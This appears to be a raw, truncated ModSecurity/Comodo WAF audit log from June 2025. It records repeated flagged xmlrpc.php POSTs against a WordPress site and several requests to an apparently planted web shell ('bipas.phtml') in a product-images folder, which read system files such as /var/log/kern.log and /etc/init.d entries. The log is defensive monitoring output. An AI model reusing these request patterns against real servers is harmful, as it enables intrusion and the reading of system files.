/admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/kern.log HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.73.6.26 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --7fe4f06a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2944 Connection: close Content-Type: text/html; charset=UTF-8 --7fe4f06a-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7hIzC7Dm45DAhop9gPNgAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1749999907832519 3976 (- - -) Stopwatch2: 1749999907832519 3976; combined=2131, p1=320, p2=1684, p3=36, p4=35, p5=56, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7fe4f06a-Z-- --ec7a6d24-A-- [15/Jun/2025:20:35:47.485511 +0530] aE7hShLQPChAjmM6-0iregAAAAQ 128.199.112.101 40966 127.0.0.1 7081 --ec7a6d24-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 511 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --ec7a6d24-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --ec7a6d24-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7hShLQPChAjmM6-0iregAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999946582861 902705 (- - -) Stopwatch2: 1749999946582861 902705; combined=2094, p1=368, p2=1331, p3=45, p4=69, p5=177, sr=100, sw=104, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ec7a6d24-Z-- --dc108733-A-- [15/Jun/2025:20:36:47.667594 +0530] aE7hhl0gAfK4E6yok-jVjwAAAA4 128.199.112.101 44232 127.0.0.1 7081 --dc108733-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 501 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --dc108733-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --dc108733-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (52+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (52+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7hhl0gAfK4E6yok-jVjwAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000006720497 947163 (- - -) Stopwatch2: 1750000006720497 947163; combined=2217, p1=358, p2=1466, p3=42, p4=61, p5=177, sr=102, sw=113, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dc108733-Z-- --f616eb54-A-- [15/Jun/2025:20:37:47.585946 +0530] aE7hwgG_OhOIIVz6TXR07gAAAAA 128.199.112.101 37676 127.0.0.1 7081 --f616eb54-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 506 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --f616eb54-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --f616eb54-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7hwgG_OhOIIVz6TXR07gAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000066665533 920469 (- - -) Stopwatch2: 1750000066665533 920469; combined=2279, p1=369, p2=1529, p3=42, p4=66, p5=170, sr=103, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f616eb54-Z-- --6fbc1769-A-- [15/Jun/2025:20:38:47.221492 +0530] aE7h_vyBV0BIpWmUvo8SeQAAAAc 128.199.112.101 38826 127.0.0.1 7081 --6fbc1769-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 506 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --6fbc1769-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6fbc1769-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7h_vyBV0BIpWmUvo8SeQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000126192982 1028576 (- - -) Stopwatch2: 1750000126192982 1028576; combined=2430, p1=422, p2=1619, p3=41, p4=90, p5=161, sr=109, sw=97, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6fbc1769-Z-- --332c476b-A-- [15/Jun/2025:20:39:47.750695 +0530] aE7iOvyBV0BIpWmUvo8SjwAAAAc 128.199.112.101 55866 127.0.0.1 7081 --332c476b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --332c476b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --332c476b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7iOvyBV0BIpWmUvo8SjwAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000186791668 959083 (- - -) Stopwatch2: 1750000186791668 959083; combined=2160, p1=355, p2=1441, p3=42, p4=57, p5=164, sr=91, sw=101, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --332c476b-Z-- --7e35db22-A-- [15/Jun/2025:20:40:46.998307 +0530] aE7idl0gAfK4E6yok-jWBQAAAA4 128.199.112.101 47806 127.0.0.1 7081 --7e35db22-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7e35db22-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7e35db22-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7idl0gAfK4E6yok-jWBQAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000246081005 917359 (- - -) Stopwatch2: 1750000246081005 917359; combined=2054, p1=390, p2=1264, p3=42, p4=61, p5=180, sr=135, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7e35db22-Z-- --1a5b4272-A-- [15/Jun/2025:20:41:47.010711 +0530] aE7isvRzj1BwdxQoarvOYwAAAAo 128.199.112.101 58826 127.0.0.1 7081 --1a5b4272-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 486 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --1a5b4272-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1a5b4272-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7isvRzj1BwdxQoarvOYwAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000306093928 916851 (- - -) Stopwatch2: 1750000306093928 916851; combined=2151, p1=385, p2=1325, p3=42, p4=108, p5=182, sr=112, sw=109, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1a5b4272-Z-- --3ea3b46c-A-- [15/Jun/2025:20:42:47.973758 +0530] aE7i7vyBV0BIpWmUvo8S4gAAAAc 128.199.112.101 56412 127.0.0.1 7081 --3ea3b46c-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --3ea3b46c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --3ea3b46c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7i7vyBV0BIpWmUvo8S4gAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000366982543 991283 (- - -) Stopwatch2: 1750000366982543 991283; combined=2394, p1=366, p2=1605, p3=48, p4=59, p5=198, sr=101, sw=118, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3ea3b46c-Z-- --f3892377-A-- [15/Jun/2025:20:43:47.151447 +0530] aE7jKtxscloMz_lG7ehrTgAAAAM 128.199.112.101 58960 127.0.0.1 7081 --f3892377-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --f3892377-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --f3892377-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7jKtxscloMz_lG7ehrTgAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000426206713 944801 (- - -) Stopwatch2: 1750000426206713 944801; combined=2195, p1=367, p2=1391, p3=45, p4=71, p5=196, sr=115, sw=125, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f3892377-Z-- --1e816a56-A-- [15/Jun/2025:20:44:48.032285 +0530] aE7jZ5K-05zbifgH_rT7VgAAAAU 128.199.112.101 49312 127.0.0.1 7081 --1e816a56-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --1e816a56-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1e816a56-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7jZ5K-05zbifgH_rT7VgAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000487101520 930821 (- - -) Stopwatch2: 1750000487101520 930821; combined=2188, p1=348, p2=1473, p3=43, p4=62, p5=162, sr=112, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1e816a56-Z-- --02201950-A-- [15/Jun/2025:20:45:00.868133 +0530] aE7jdPyBV0BIpWmUvo8TFwAAAAc 54.86.59.155 57456 127.0.0.1 7081 --02201950-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/grafana-server HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.86.59.155 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --02201950-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4526 Connection: close Content-Type: text/html; charset=UTF-8 --02201950-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/grafana-server"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7jdPyBV0BIpWmUvo8TFwAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/grafana-server"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7jdPyBV0BIpWmUvo8TFwAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750000500863275 4930 (- - -) Stopwatch2: 1750000500863275 4930; combined=2623, p1=373, p2=2040, p3=56, p4=39, p5=114, sr=114, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --02201950-Z-- --24955337-A-- [15/Jun/2025:20:45:48.251155 +0530] aE7jowG_OhOIIVz6TXR1sgAAAAA 128.199.112.101 43260 127.0.0.1 7081 --24955337-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --24955337-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --24955337-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7jowG_OhOIIVz6TXR1sgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000547343098 908125 (- - -) Stopwatch2: 1750000547343098 908125; combined=2281, p1=418, p2=1449, p3=43, p4=65, p5=192, sr=130, sw=114, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --24955337-Z-- --50c1c940-A-- [15/Jun/2025:20:46:00.701079 +0530] aE7jsBLQPChAjmM6-0iskgAAAAQ 52.73.142.41 39620 127.0.0.1 7081 --50c1c940-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/syslog.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.73.142.41 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --50c1c940-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2944 Connection: close Content-Type: text/html; charset=UTF-8 --50c1c940-H-- Message: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched 